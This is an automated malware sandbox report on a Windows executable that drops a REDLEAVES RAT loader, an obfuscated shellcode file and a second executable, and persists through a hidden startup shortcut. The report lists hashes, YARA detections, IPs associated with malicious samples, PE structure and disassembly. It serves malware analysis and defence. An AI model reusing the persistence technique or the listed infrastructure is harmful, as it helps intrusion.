    • Successful, ratio: 27.5% (good quality ratio 26.9%)
    • Quality average: 82.1%
    • Quality standard deviation: 23.5%
    HCA Information:
    • Successful, ratio: 87%
    • Number of executed functions: 114
    • Number of non-executed functions: 357
    Cookbook Comments:
    • Adjust boot time
    • Enable AMSI

    Warnings

    • Exclude process from analysis (whitelisted): MpCmdRun.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe
    • Excluded domains from analysis (whitelisted): fs.microsoft.com
    • Not all processes where analyzed, report is missing behavior information
    • Report creation exceeded maximum time and may have missing disassembly code information.
    • Report size exceeded maximum capacity and may have missing disassembly code.
    • Report size getting too big, too many NtOpenKeyEx calls found.
    • Report size getting too big, too many NtQueryValueKey calls found.

    Simulations

    Behavior and APIs

    TimeTypeDescription
    07:21:35AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persuasion.lnk

    Joe Sandbox View / Context

    IPs

    No context

    Domains

    No context

    ASNs

    MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
    INCERO-HVVCUSZxk5N1NInW.dllGet hashmaliciousBrowse
    • 104.251.214.46
    480130269411023062.xlsGet hashmaliciousBrowse
    • 104.251.214.46
    JgLtXCuKO1.dllGet hashmaliciousBrowse
    • 104.251.214.46
    Invoice.xlsGet hashmaliciousBrowse
    • 104.251.214.46
    adP3gvhbFy.xlsGet hashmaliciousBrowse
    • 104.251.214.46
    test.xlsGet hashmaliciousBrowse
    • 104.251.214.46
    test.xlsGet hashmaliciousBrowse
    • 104.251.214.46
    BMRtHXBgME.xlsxGet hashmaliciousBrowse
    • 104.251.214.46
    sample2.dllGet hashmaliciousBrowse
    • 104.251.214.46
    EXT Payment status.xlsGet hashmaliciousBrowse
    • 104.251.214.46
    MDZ6293866113 invoice.xlsGet hashmaliciousBrowse
    • 104.251.214.46
    PTdIj2z8va.dllGet hashmaliciousBrowse
    • 104.251.214.46
    3ssLTGLlDq.dllGet hashmaliciousBrowse
    • 104.251.214.46
    Payment Confirmation.xlsGet hashmaliciousBrowse
    • 104.251.214.46
    ArDm2v8wD2.dllGet hashmaliciousBrowse
    • 104.251.214.46
    ArDm2v8wD2.dllGet hashmaliciousBrowse
    • 104.251.214.46
    sample.dllGet hashmaliciousBrowse
    • 104.251.214.46
    ovzuqEdLPW.xlsGet hashmaliciousBrowse
    • 104.251.214.46
    sample.dllGet hashmaliciousBrowse
    • 104.251.214.46
    Ommega_10.xlsGet hashmaliciousBrowse
    • 104.251.214.46
    DIGITALOCEAN-ASNUSDhlinvoice.exeGet hashmaliciousBrowse
    • 164.90.194.235
    lv4YnDgTEQ.dllGet hashmaliciousBrowse
    • 128.199.192.135
    Factura Proforma.xlsxGet hashmaliciousBrowse
    • 164.90.194.235
    Datei 7563091663.xlsmGet hashmaliciousBrowse
    • 128.199.192.135
    ohne Titel_0903.xlsmGet hashmaliciousBrowse
    • 128.199.192.135
    Daten-0903.xlsmGet hashmaliciousBrowse
    • 128.199.192.135
    Pack-564.xlsmGet hashmaliciousBrowse
    • 128.199.192.135
    SecuriteInfo.com.Trojan.GenericKD.39062394.12645.exeGet hashmaliciousBrowse
    • 206.189.100.203
    SyPFqX9yDb.dllGet hashmaliciousBrowse
    • 128.199.192.135
    TqxMibPJh6.exeGet hashmaliciousBrowse
    • 174.138.9.123
    1dECJNMZg9.dllGet hashmaliciousBrowse
    • 128.199.192.135
    16aDA1C0fz.dllGet hashmaliciousBrowse
    • 128.199.192.135
    D1YCISnN44.dllGet hashmaliciousBrowse
    • 128.199.192.135
    II4tcMX36v.dllGet hashmaliciousBrowse
    • 128.199.192.135
    ZsVX7IUcoK.dllGet hashmaliciousBrowse
    • 128.199.192.135
    DGekq4g1qR.dllGet hashmaliciousBrowse
    • 128.199.192.135
    o47ExhSpP7K.dllGet hashmaliciousBrowse
    • 128.199.192.135
    emotionaldamage.dllGet hashmaliciousBrowse
    • 178.128.83.165
    eJVPkEP8QSGet hashmaliciousBrowse
    • 206.189.138.201
    0NG42A8U4PGet hashmaliciousBrowse
    • 138.68.185.187

    JA3 Fingerprints

    No context

    Dropped Files

    No context

    Created / dropped Files

    C:\Users\user\AppData\Local\Temp\StarBurn.dll

    Download File
    Process:C:\Users\user\Desktop\cANdLlHS4N.exe
    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):134244
    Entropy (8bit):6.439912486566814
    Encrypted:false
    SSDEEP:3072:JmeUE3TxGh4MwlW7AzD7Lcv4L2ZbDdlWG/4:Jm7EUhTwljDS4LevXWGg
    MD5:A03FFF06A20EE6943154481C883174A8
    SHA1:4470E24C366AD001ED6FE77B6A09C845D4EF6A86
    SHA-256:2F3C5A34E0483A5F1739AFAA3E893955F4D81869506A49F28F6A3AC944050900
    SHA-512:DCF944225471940C4C84F31A1409715EB1AE0B68AA1DA21ADCA23477D3C589D8D15213BAA3C105710D532190570C55492885E515220E3B18941096571A292A73
    Malicious:true
    Yara Hits:
    • Rule: REDLEAVES_DroppedFile_ImplantLoader_Starburn, Description: Detect the DLL responsible for loading and deobfuscating the DAT file containing shellcode and core REDLEAVES RAT, Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, Author: USG
    • Rule: OpCloudHopper_Malware_6, Description: Detects malware from Operation Cloud Hopper, Source: C:\Users\user\AppData\Local\Temp\StarBurn.dll, Author: Florian Roth
    Antivirus:
    • Antivirus: Avira, Detection: 100%
    Reputation:low
    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.^...0...0...0.~...<.0.~.....0.~...e.0.......0.......0...1.N.0.~.....0.~.....0.~.....0.Rich..0.........................PE..L...|..X...........!.....J...........u.......`...............................p......9.....@.........................`....,.....x....0.......................@..........................................@............`..|............................text...xI.......J.................. ..`.rdata..]....`.......N..............@..@.data...\7..........................@....rsrc........0......................@..@.reloc...#...@...$..................@..B................................................................................................................................................................................................................................................................................................................

    C:\Users\user\AppData\Local\Temp\handkerchief.dat

    Download File
    Process:C:\Users\user\Desktop\cANdLlHS4N.exe
    File Type:data
    Category:dropped
    Size (bytes):254593
    Entropy (8bit):6.992551822422355
    Encrypted:false
    SSDEEP:6144:cMq9yyNTKrkgMEVAUtmEXlW+/xf8GQ6/Ta2QSirGf23YJKRluri9Zoqip3:Q9lNTokREm0mN+/uGQ6/O2orsKHt9Zo1
    MD5:FB0C714CD2EBDCC6F33817ABE7813C36
    SHA1:FC4F3698E768F690425523CDFD548B81D891C3B0
    SHA-256:773B176B3A68C3D21FAE907AF8FBA7908B55726BD591C5335C8C0BC9DE179B76
    SHA-512:65EF996A9A9BD47D50F7649C7895D000C943346B17385390B951691CEC07ED7AA487CA3225EE84022B67643F2A574E7DE8C18F81F2576F0BE92BD3930EE9FDC6
    Malicious:false
    Yara Hits:
    • Rule: REDLEAVES_DroppedFile_ObfuscatedShellcodeAndRAT_handkerchief, Description: Detect obfuscated .dat file containing shellcode and core REDLEAVES RAT, Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat, Author: USG
    • Rule: SUSP_XORed_MSDOS_Stub_Message, Description: Detects suspicious XORed MSDOS stub message, Source: C:\Users\user\AppData\Local\Temp\handkerchief.dat, Author: Florian Roth
    Reputation:low
    Preview:0891@VR68D748062..D.........N........HML.....^.{(....+....m..m..e.....o..-...n.E....f..\'.O.c..Q..A;..R./...\~oK".n.itxZ"].n..A?..}..P.A.......^.q.szibZsWryisWtz.OL..^...z.^.}..}.V.N.....N..^..^.V..V..^......N..N.^.#.oD.V.V..N......o..V....V...N.a.5.wwn..^.K.N.^....V.J.N.I.N.V._...N....N.^....^.V.V....N.0N.N.{0.^..........^..........R...n.z.^....^..^......V.V.N.!.o$.^.^..V......o..^....^...V.N..O..^....^.V....V.N.N..^.0^.^...............N..........................................[...(.......}...+.....[...(..*....}............7......../............(..#.....?..........................3.................c........^......g.................^.^.......(..........................#.........s......+...Kq..N..................c...........c.......c...c.......f...c....+.../H..c....+......c...........c.......c...c.......f.........c.........c...........c.......c...c.......f.........c...c....+...........

    C:\Users\user\AppData\Local\Temp\obedience.exe

    Download File
    Process:C:\Users\user\Desktop\cANdLlHS4N.exe
    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
    Category:dropped
    Size (bytes):1616040
    Entropy (8bit):7.373866112987865
    Encrypted:false
    SSDEEP:49152:fFdy58d2Bqc8Y7IDbauSVGDzhGjThGDzhmj8L5NsmCY:fFs58d2Bqc8Y7IDbauSVGDzhGjThGDzo
    MD5:6A1C14D5F16A07BEF55943134FE618C0
    SHA1:1A46E961BFFC6BCC1ADAC9708393462024F0F6AD
    SHA-256:ABA4DF64717462C61801D737C9FA20A7FADA61539EAEF50954331D31F7306D27
    SHA-512:07A8D9899CE04C4248CEBDFC105A37F3D8A337FF8F498F23853EDD05AC054DD99F976B13B2348660099C9135CE16A0876F7CFDF87E4B7139E88C27F9C598CF9B
    Malicious:true
    Antivirus:
    • Antivirus: Metadefender, Detection: 8%, Browse
    • Antivirus: ReversingLabs, Detection: 9%
    Reputation:low
    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*..........................................@.................................c,...........@.............................../...........................`..$............................P......................................................CODE....$........................... ..`DATA................................@...BSS......................................idata.../.......0..................@....tls.........@...........................rdata.......P......................@..P.reloc..$....`......................@..P.rsrc...............................@..P....................................@..P........................................................................................................................................

    C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\persuasion.lnk

    Download File
    Process:C:\Users\user\AppData\Local\Temp\obedience.exe
    File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Archive, ctime=Thu Mar 10 05:21:32 2022, mtime=Thu Mar 10 05:21:44 2022, atime=Thu Mar 10 05:21:32 2022, length=1616040, window=hide
    Category:dropped
    Size (bytes):1118
    Entropy (8bit):5.008588795039891
    Encrypted:false
    SSDEEP:24:8mrk3tHwNeRhHgKGUsAwZfaBJ9YC7aB6m:8mrk3tIeRhTrOaBJ9GB6
    MD5:D47E7BF51A9E2A6A44377FBC009DDB8D
    SHA1:4EF66D3777808262BD963A9188EF9C5D4B298AD9
    SHA-256:C755D52F273156F5C8F2D133260A8332C71FB8252398834379588949A8F8AE2D
    SHA-512:0CBA99F6751C04383823984474BF8A23DBD094BEAFE60B9E89BBFE4309822EC65C8E2306EA8D916056826D9A3EDE8691F4444FD7183C7C8A2DA0F14D5FE8D266
    Malicious:false
    Reputation:low
    Preview:L..................F.... .......G4..k.I.G4......G4............................:..DG..Yr?.D..U..k0.&...&...........-....$..2...hy.G4......t...CFSF..1......N....AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......N..jT.2.....Y....................yN|.A.p.p.D.a.t.a...B.P.1.....>Q.;..Local.<.......N..jT.2.....Y........................L.o.c.a.l.....N.1.....jT.2..Temp..:.......N..jT.2.....Y.....................J..T.e.m.p.....h.2.....jT.2 .OBEDIE~1.EXE..L......jT.2jT.2.....S....................$Z..o.b.e.d.i.e.n.c.e...e.x.e.......^...............-.......]............'......C:\Users\user\AppData\Local\Temp\obedience.exe..*.....\.....\.....\.....\.....\.....\.L.o.c.a.l.\.T.e.m.p.\.o.b.e.d.i.e.n.c.e...e.x.e.".C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.........|....I.J.H..K..:...`.......X.......971342...........!a..%.H.VZAj....%$.............!a..%.H.VZAj....%$........................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.3.8.5.3.3.2.1.9.3.5.-.2.1.2.5

    Static File Info

    General

    File type:PE32 executable (GUI) Intel 80386, for MS Windows
    Entropy (8bit):7.349238472441651
    TrID:
    • Win32 Executable (generic) a (10002005/4) 99.96%
    • Generic Win/DOS Executable (2004/3) 0.02%
    • DOS Executable Generic (2002/1) 0.02%
    • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
    File name:cANdLlHS4N.exe
    File size:3804160
    MD5:b3139b26a2dabb9b6e728884d8fa8b33
    SHA1:de5672c7940e4fad3c8145ce9e8a5fcb1da0fcee
    SHA256:5262cb9791df50fafcb2fbd5f93226050b51efe400c2924eecba97b7ce437481
    SHA512:f6b857fdb4b393e9e80893d081c46471cb75a92289d53a8d457fe889eee46b7212c5188032aa24400da6e8ba56168716aeb3e48c77758b4fbb74817ba4b13951
    SSDEEP:98304:drzo0aM7e5O92nAv/tyE6peB1IY8CEueiSH0h292bNcx:pzo0S4yRY8tueiSUh1bCx
    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........a...............x\......xL..............vA......vu.[....vt......vE......vB.....Rich....................PE..L...M..X...........

    File Icon

    Icon Hash:e4e4b2b2a4b4b4a4

    Static PE Info

    General

    Entrypoint:0x50cf91
    Entrypoint Section:.text
    Digitally signed:false
    Imagebase:0x400000
    Subsystem:windows gui
    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
    DLL Characteristics:TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
    Time Stamp:0x58ACFA4D [Wed Feb 22 02:41:17 2017 UTC]
    TLS Callbacks:
    CLR (.Net) Version:
    OS Version Major:5
    OS Version Minor:1
    File Version Major:5
    File Version Minor:1
    Subsystem Version Major:5
    Subsystem Version Minor:1
    Import Hash:c20231bee688c91a492f8eb02fe15604

    Entrypoint Preview

    Instruction
    call 00007F907CA3EEFEh
    jmp 00007F907CA34F0Eh
    mov edi, edi
    push ebp
    mov ebp, esp
    push ebx
    mov ebx, dword ptr [ebp+08h]
    cmp ebx, FFFFFFE0h
    jnbe 00007F907CA350F1h
    push esi
    push edi
    cmp dword ptr [00773A24h], 00000000h
    jne 00007F907CA3509Ah
    call 00007F907CA3E88Dh
    push 0000001Eh
    call 00007F907CA3E6D7h
    push 000000FFh
    call 00007F907CA34A3Fh
    pop ecx
    pop ecx
    test ebx, ebx
    je 00007F907CA35086h
    mov eax, ebx
    jmp 00007F907CA35085h
    xor eax, eax
    inc eax
    push eax
    push 00000000h
    push dword ptr [00773A24h]
    call dword ptr [0053626Ch]
    mov edi, eax
    test edi, edi
    jne 00007F907CA350A8h
    push 0000000Ch
    pop esi
    cmp dword ptr [007742E8h], eax
    je 00007F907CA3508Fh
    push ebx
    call 00007F907CA3E48Bh
    pop ecx
    test eax, eax
    jne 00007F907CA3502Bh
    jmp 00007F907CA35089h
    call 00007F907CA35B82h
    mov dword ptr [eax], esi
    call 00007F907CA35B7Bh
    mov dword ptr [eax], esi
    mov eax, edi
    pop edi
    pop esi
    jmp 00007F907CA35096h
    push ebx
    call 00007F907CA3E46Ah
    pop ecx
    call 00007F907CA35B67h
    mov dword ptr [eax], 0000000Ch
    xor eax, eax
    pop ebx
    pop ebp
    ret
    mov edi, edi
    push ebp
    mov ebp, esp
    mov eax, dword ptr [ebp+08h]
    push esi
    mov esi, ecx
    mov byte ptr [esi+0Ch], 00000000h
    test eax, eax
    jne 00007F907CA350E5h
    call 00007F907CA3C2C2h
    mov dword ptr [esi+08h], eax
    mov ecx, dword ptr [eax+6Ch]
    mov dword ptr [esi], ecx
    mov ecx, dword ptr [eax+68h]
    mov dword ptr [esi+04h], ecx
    mov ecx, dword ptr [esi]
    cmp ecx, dword ptr [00000000h]

    Rich Headers

    Programming Language:
    • [ C ] VS2008 SP1 build 30729
    • [ASM] VS2010 build 30319
    • [ C ] VS2010 build 30319
    • [C++] VS2010 build 30319
    • [RES] VS2010 build 30319
    • [IMP] VS2008 SP1 build 30729
    • [LNK] VS2010 build 30319

    Data Directories

    NameVirtual AddressVirtual Size Is in Section
    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IMPORT0x179b140x168.rdata
    IMAGE_DIRECTORY_ENTRY_RESOURCE0x3760000x9c28.rsrc
    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
    IMAGE_DIRECTORY_ENTRY_BASERELOC0x3800000x1bb70.reloc
    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x160b100x40.rdata
    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_IAT0x1360000x9d0.rdata
    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

    Sections

    NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
    .text0x10000x1349380x134a00False0.562648719117data6.53626347491IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
    .rdata0x1360000x470620x47200False0.270200598638data5.08185706308IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .data0x17e0000x1f77240x1f0200False0.373334258472data7.60576445986IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
    .rsrc0x3760000x9c280x9e00False0.375247231013data5.1750982001IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
    .reloc0x3800000x2aa6e0x2ac00False0.271872715643data5.04489445576IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

    Resources

    NameRVASizeTypeLanguageCountry
    RT_CURSOR0x376f580x134dataChineseChina
    RT_CURSOR0x37708c0xb4dataChineseChina
    RT_CURSOR0x3771400x134AmigaOS bitmap fontChineseChina
    RT_CURSOR0x3772740x134dataChineseChina
    RT_CURSOR0x3773a80x134dataChineseChina
    RT_CURSOR0x3774dc0x134dataChineseChina
    RT_CURSOR0x3776100x134dataChineseChina
    RT_CURSOR0x3777440x134dataChineseChina
    RT_CURSOR0x3778780x134dataChineseChina
    RT_CURSOR0x3779ac0x134dataChineseChina
    RT_CURSOR0x377ae00x134dataChineseChina
    RT_CURSOR0x377c140x134dataChineseChina
    RT_CURSOR0x377d480x134AmigaOS bitmap fontChineseChina
    RT_CURSOR0x377e7c0x134dataChineseChina
    RT_CURSOR0x377fb00x134dataChineseChina
    RT_CURSOR0x3780e40x134dataChineseChina
    RT_BITMAP0x3782180xb8dataChineseChina
    RT_BITMAP0x3782d00x144dataChineseChina
    RT_ICON0x3784140x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 2290679807, next used block 8912767
    RT_ICON0x3786fc0x128GLS_BINARY_LSB_FIRST
    RT_ICON0x3788240xea8data
    RT_ICON0x3796cc0x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
    RT_ICON0x379f740x568GLS_BINARY_LSB_FIRST
    RT_ICON0x37a4dc0x25a8data
    RT_ICON0x37ca840x10a8data
    RT_ICON0x37db2c0x468GLS_BINARY_LSB_FIRST
    RT_ICON0x37df940x2e8data
    RT_ICON0x37e27c0x128GLS_BINARY_LSB_FIRST
    RT_MENU0x37e3a40x18cdataChineseChina
    RT_DIALOG0x37e5300xd6data
    RT_DIALOG0x37e6080xe2dataChineseChina
    RT_DIALOG0x37e6ec0x34dataChineseChina
    RT_STRING0x37e7200x2edata
    RT_STRING0x37e7500x30data
    RT_STRING0x37e7800x8edata
    RT_STRING0x37e8100xc0data
    RT_STRING0x37e8d00x136data
    RT_STRING0x37ea080x3cdata
    RT_STRING0x37ea440x60data
    RT_STRING0x37eaa40x54data
    RT_STRING0x37eaf80x3adata
    RT_STRING0x37eb340xa4data
    RT_STRING0x37ebd80x3edata
    RT_STRING0x37ec180x4edataChineseChina
    RT_STRING0x37ec680x2cdataChineseChina
    RT_STRING0x37ec940x84dataChineseChina
    RT_STRING0x37ed180x1c4dataChineseChina
    RT_STRING0x37eedc0x14edataChineseChina
    RT_STRING0x37f02c0x10edataChineseChina
    RT_STRING0x37f13c0x50dataChineseChina
    RT_STRING0x37f18c0x44dataChineseChina
    RT_STRING0x37f1d00x68dataChineseChina
    RT_STRING0x37f2380x1b2dataChineseChina
    RT_STRING0x37f3ec0xf4dataChineseChina
    RT_STRING0x37f4e00x24dataChineseChina
    RT_STRING0x37f5040x1a6dataChineseChina
    RT_ACCELERATOR0x37f6ac0x68data
    RT_GROUP_CURSOR0x37f7140x22Lotus unknown worksheet or configuration, revision 0x2ChineseChina
    RT_GROUP_CURSOR0x37f7380x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f74c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f7600x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f7740x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f7880x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f79c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f7b00x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f7c40x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f7d80x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f7ec0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f8000x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f8140x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f8280x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_CURSOR0x37f83c0x14Lotus unknown worksheet or configuration, revision 0x1ChineseChina
    RT_GROUP_ICON0x37f8500x76data
    RT_GROUP_ICON0x37f8c80x22data
    RT_VERSION0x37f8ec0xdcdata
    RT_MANIFEST0x37f9c80x25fASCII text, with very long lines, with no line terminatorsEnglishUnited States

    Imports

    DLLImport
    KERNEL32.dllLCMapStringW, GetTimeZoneInformation, WriteConsoleW, CompareStringW, IsValidLocale, CreateFileW, SetEnvironmentVariableA, GetStringTypeW, IsValidCodePage, GetEnvironmentStringsW, QueryPerformanceCounter, FreeEnvironmentStringsW, GetLocaleInfoW, GetConsoleMode, GetConsoleCP, GetStdHandle, SetHandleCount, HeapCreate, IsDebuggerPresent, SetUnhandledExceptionFilter, UnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, GetFileType, SetStdHandle, GetSystemTimeAsFileTime, HeapSize, HeapQueryInformation, HeapReAlloc, VirtualQuery, GetSystemInfo, CreateThread, ExitThread, HeapAlloc, GetStartupInfoW, HeapSetInformation, GetCommandLineA, EncodePointer, DecodePointer, ExitProcess, RaiseException, RtlUnwind, HeapFree, FindResourceExW, SearchPathA, GetProfileIntA, InitializeCriticalSectionAndSpinCount, SetErrorMode, GetNumberFormatA, GetWindowsDirectoryA, GetFileSizeEx, LocalFileTimeToFileTime, GetFileAttributesExA, FileTimeToLocalFileTime, FileTimeToSystemTime, GetShortPathNameA, GetVolumeInformationA, FindFirstFileA, FindClose, GetCurrentProcess, DuplicateHandle, GetFileSize, SetEndOfFile, UnlockFile, LockFile, FlushFileBuffers, SetFilePointer, WriteFile, ReadFile, MoveFileA, CreateFileA, lstrcmpiA, GetThreadLocale, GetStringTypeExA, DeleteFileA, GetCurrentDirectoryA, GetACP, GetOEMCP, GetCPInfo, GetModuleFileNameW, ReleaseActCtx, CreateActCtxW, TlsFree, DeleteCriticalSection, LocalReAlloc, TlsSetValue, TlsAlloc, InitializeCriticalSection, GlobalHandle, GlobalReAlloc, EnterCriticalSection, TlsGetValue, LeaveCriticalSection, LocalAlloc, GlobalFlags, CopyFileA, GlobalSize, FormatMessageA, LocalFree, lstrlenW, MulDiv, GetDiskFreeSpaceA, GetFullPathNameA, GetTempFileNameA, GetFileTime, SetFileTime, ReplaceFileA, SystemTimeToFileTime, GetFileAttributesA, GetUserDefaultLCID, GlobalFree, GetPrivateProfileStringA, WritePrivateProfileStringA, GetPrivateProfileIntA, WaitForSingleObject, ResumeThread, SetThreadPriority, GetCurrentThread, GetUserDefaultUILanguage, ConvertDefaultLocale, GetSystemDefaultUILanguage, GetModuleFileNameA, GetLocaleInfoA, InterlockedExchange, lstrcmpA, GlobalAlloc, GetModuleHandleW, FindResourceA, FreeResource, GetCurrentThreadId, GlobalFindAtomA, GlobalDeleteAtom, GetVersionExA, FreeLibrary, CompareStringA, LoadLibraryW, lstrcmpW, GlobalLock, GlobalUnlock, GetCurrentProcessId, GetProcAddress, GetModuleHandleA, LoadLibraryA, lstrlenA, GlobalGetAtomNameA, GlobalAddAtomA, ActivateActCtx, DeactivateActCtx, SetLastError, FindResourceW, LoadResource, LockResource, SizeofResource, InterlockedDecrement, InterlockedIncrement, CreateMutexA, GetLastError, WideCharToMultiByte, GetTempPathA, CreateProcessA, GetTickCount, VirtualAlloc, lstrcpyA, lstrcatA, MultiByteToWideChar, Sleep, CreateToolhelp32Snapshot, Process32First, Process32Next, CloseHandle, EnumSystemLocalesA, VirtualProtect, GetProcessHeap
    USER32.dllCharUpperA, KillTimer, SetTimer, UnionRect, SetParent, GetSystemMenu, DeleteMenu, IsRectEmpty, LoadCursorW, SetLayeredWindowAttributes, EnumDisplayMonitors, LoadCursorA, GetSysColorBrush, MapVirtualKeyA, GetKeyNameTextA, SystemParametersInfoA, GetSystemMetrics, GetMenuItemInfoA, InflateRect, RealChildWindowFromPoint, EndPaint, BeginPaint, GetWindowDC, ClientToScreen, GrayStringA, DrawTextExA, DrawTextA, TabbedTextOutA, FillRect, GetMenuStringA, AppendMenuA, InsertMenuA, RemoveMenu, GetDC, ReleaseDC, SetWindowContextHelpId, MapDialogRect, CreateDialogIndirectParamA, GetNextDlgTabItem, EndDialog, ShowOwnedPopups, GetMessageA, TranslateMessage, GetCursorPos, ValidateRect, PostQuitMessage, MoveWindow, SetWindowTextA, IsDialogMessageA, CheckDlgButton, SetMenuItemBitmaps, GetMenuCheckMarkDimensions, LoadBitmapW, ModifyMenuA, GetMenuState, EnableMenuItem, CheckMenuItem, RegisterWindowMessageA, LoadIconA, SendDlgItemMessageA, IsChild, SetWindowsHookExA, CallNextHookEx, GetClassLongA, SetPropA, GetPropA, RemovePropA, GetFocus, GetWindowTextLengthA, GetWindowTextA, GetForegroundWindow, DispatchMessageA, BeginDeferWindowPos, EndDeferWindowPos, GetTopWindow, DestroyWindow, UnhookWindowsHookEx, CloseClipboard, GetMessagePos, GetMonitorInfoA, MapWindowPoints, ScrollWindow, TrackPopupMenu, SetScrollRange, GetScrollRange, SetScrollPos, GetScrollPos, SetForegroundWindow, ShowScrollBar, MessageBoxA, CreateWindowExA, GetClassInfoExA, RegisterClassA, AdjustWindowRectEx, GetWindowRect, ScreenToClient, DeferWindowPos, GetScrollInfo, SetScrollInfo, SetWindowPlacement, GetWindowPlacement, DefWindowProcA, CallWindowProcA, GetClassNameA, GetSysColor, UnpackDDElParam, ReuseDDElParam, LoadMenuA, DestroyMenu, WinHelpA, SetWindowPos, LoadImageA, DestroyIcon, SetFocus, GetWindowThreadProcessId, GetActiveWindow, IsWindowEnabled, EqualRect, GetDlgItem, SetWindowLongA, GetDlgCtrlID, GetKeyState, LoadIconW, SetCursor, PeekMessageA, GetCapture, ReleaseCapture, SetClipboardData, OpenClipboard, GetUpdateRect, LoadAcceleratorsA, GetParent, UpdateWindow, EnableWindow, PtInRect, GetClientRect, FrameRect, SetActiveWindow, IsWindowVisible, IsIconic, SendMessageA, InsertMenuItemA, GetSubMenu, GetMenuItemID, GetMenuItemCount, CreatePopupMenu, GetClassInfoA, IntersectRect, OffsetRect, SetRectEmpty, CopyRect, GetMenu, GetLastActivePopup, LoadAcceleratorsW, LoadMenuW, CharNextA, CopyAcceleratorTableA, SetRect, GetWindowRgn, DestroyCursor, DrawIcon, SubtractRect, MapVirtualKeyExA, BringWindowToTop, PostMessageA, SetMenu, GetDesktopWindow, GetWindow, ShowWindow, GetWindowLongA, IsWindow, TranslateAcceleratorA, InvalidateRect, IsCharLowerA, GetDoubleClickTime, CharUpperBuffA, CopyIcon, LoadImageW, MonitorFromWindow, EmptyClipboard, IsClipboardFormatAvailable, SetMenuDefaultItem, WaitMessage, PostThreadMessageA, CreateMenu, IsMenu, UpdateLayeredWindow, MonitorFromPoint, InvalidateRgn, DrawMenuBar, DefMDIChildProcA, DefFrameProcA, RegisterClipboardFormatA, CopyImage, GetIconInfo, EnableScrollBar, HideCaret, InvertRect, GetMenuDefaultItem, LockWindowUpdate, SetCursorPos, CreateAcceleratorTableA, GetKeyboardState, GetKeyboardLayout, ToAsciiEx, DrawFocusRect, DrawFrameControl, DrawEdge, DrawIconEx, DrawStateA, SetClassLongA, GetAsyncKeyState, NotifyWinEvent, WindowFromPoint, DestroyAcceleratorTable, RedrawWindow, SetWindowRgn, IsZoomed, UnregisterClassA, MessageBeep, GetNextDlgGroupItem, GetMessageTime, SetCapture, TranslateMDISysAccel
